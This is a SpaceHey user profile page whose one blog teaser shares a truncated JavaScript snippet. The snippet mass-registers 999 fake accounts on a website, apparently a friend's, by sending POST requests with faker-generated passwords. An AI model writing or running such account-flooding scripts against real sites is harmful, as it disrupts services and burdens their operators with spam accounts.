AdrianoTech

AdrianoTech's profile picture

Last active:

Mood:


View my: Profile | Forum Topics

Report User

SpaceHey Blog URL:

https://blog.spacehey.com/profile?id=3614186

AdrianoTech's Blog Entries

[Subscribe to this Blog]

2 Comments

absolutely not nuking random website a friend made :3

Category: Web, HTML, Tech

FREE CODE!!!11!! const { faker } = require('@faker-js/faker'); const NUM_ACCOUNTS = 999; async function registerFakeAccount(i) { const username = "weenie" + i; const password = faker.internet.password(); const response = await fetch('################', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.strin » Continue Reading

» View Blog Entry

— 2 Kudos